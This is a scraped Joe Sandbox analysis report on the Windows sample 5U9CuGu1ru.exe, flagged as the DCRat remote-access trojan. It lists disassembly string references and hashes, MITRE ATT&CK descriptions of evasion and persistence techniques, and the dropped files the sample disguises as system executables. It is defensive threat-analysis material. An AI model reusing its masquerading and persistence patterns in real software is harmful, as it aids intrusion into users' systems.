], xrefs: 00007FF848F3ED07
V, xrefs: 00007FF848F3ED3C
6, xrefs: 00007FF848F3EC9F
^, xrefs: 00007FF848F3ED9D

Memory Dump Source

Source File: 00000019.00000002.2277481050.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f3a000_WHqeodkmYpJedFVKZpNEincEtJvAcD.jbxd

Similarity

API ID:
String ID: 6$V$]$^
API String ID: 0-1270753922
Opcode ID: 2b10022d8cbe09c05b806504e4dbe33603f497203cdad67dbdc7ffe766c44c20
Instruction ID: 07b80ddd3110100a45e91062fe83c3044c445b20e07afe3c0b4f35994d051383
Opcode Fuzzy Hash: 2b10022d8cbe09c05b806504e4dbe33603f497203cdad67dbdc7ffe766c44c20
Instruction Fuzzy Hash: 3531B171D086298FDBA4EF25C9487EDB6B1AF18341F5041EAD44DA3281CB785EC4CF40

Function 00007FF848F3EB93 Relevance: 5.0, Strings: 4, Instructions: 33COMMON

Download Yara Rule

Strings

(, xrefs: 00007FF848F3EBE0
", xrefs: 00007FF848F3EBA7
N, xrefs: 00007FF848F3EC1B
M, xrefs: 00007FF848F3EBB7

Memory Dump Source

Source File: 00000019.00000002.2277481050.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f3a000_WHqeodkmYpJedFVKZpNEincEtJvAcD.jbxd

Similarity

API ID:
String ID: "$($M$N
API String ID: 0-2673639397
Opcode ID: 62ff3130e6381cd014ee0762794b2c32f6b580d97bfb03732bf2fe9f33d5f98a
Instruction ID: c7cb3b885825b8006111a728fab5692cf881b9a7ef01f2c368e53f003adce17e
Opcode Fuzzy Hash: 62ff3130e6381cd014ee0762794b2c32f6b580d97bfb03732bf2fe9f33d5f98a
Instruction Fuzzy Hash: 5B01C8B1D092299FDBA5EF64D8443EDB6F1AF08340F5040EAD40DA6281DB389A84DF04

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5U9CuGu1ru.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

C:\Program Files (x86)\Windows Multimedia Platform\b7ad5a7a0bb6c8

C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

C:\Program Files (x86)\Windows Portable Devices\b7ad5a7a0bb6c8

C:\Program Files\Google\Chrome\Application\SetupMetrics\66fc9ff0ee96c2

C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe

C:\Program Files\Windows Defender Advanced Threat Protection\1a5d5b8dcee3d8

C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe

C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

C:\Program Files\Windows Mail\b7ad5a7a0bb6c8

C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

C:\Program Files\Windows NT\TableTextService\b7ad5a7a0bb6c8

C:\Recovery\9e8d7a4ca61bd9

C:\Recovery\RuntimeBroker.exe

C:\Recovery\ShellExperienceHost.exe

C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

C:\Recovery\b7ad5a7a0bb6c8

Windows Analysis Report
5U9CuGu1ru.exe